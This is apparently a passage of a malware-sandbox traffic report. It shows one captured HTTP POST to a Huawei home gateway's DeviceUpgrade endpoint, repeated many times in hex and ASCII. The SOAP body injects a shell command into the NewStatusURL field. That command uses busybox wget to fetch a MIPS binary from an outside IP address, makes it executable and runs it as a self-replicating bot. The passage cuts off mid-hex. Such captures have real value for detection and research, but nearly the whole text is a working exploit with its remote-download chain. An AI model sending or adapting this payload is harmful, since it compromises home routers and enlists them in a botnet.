73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 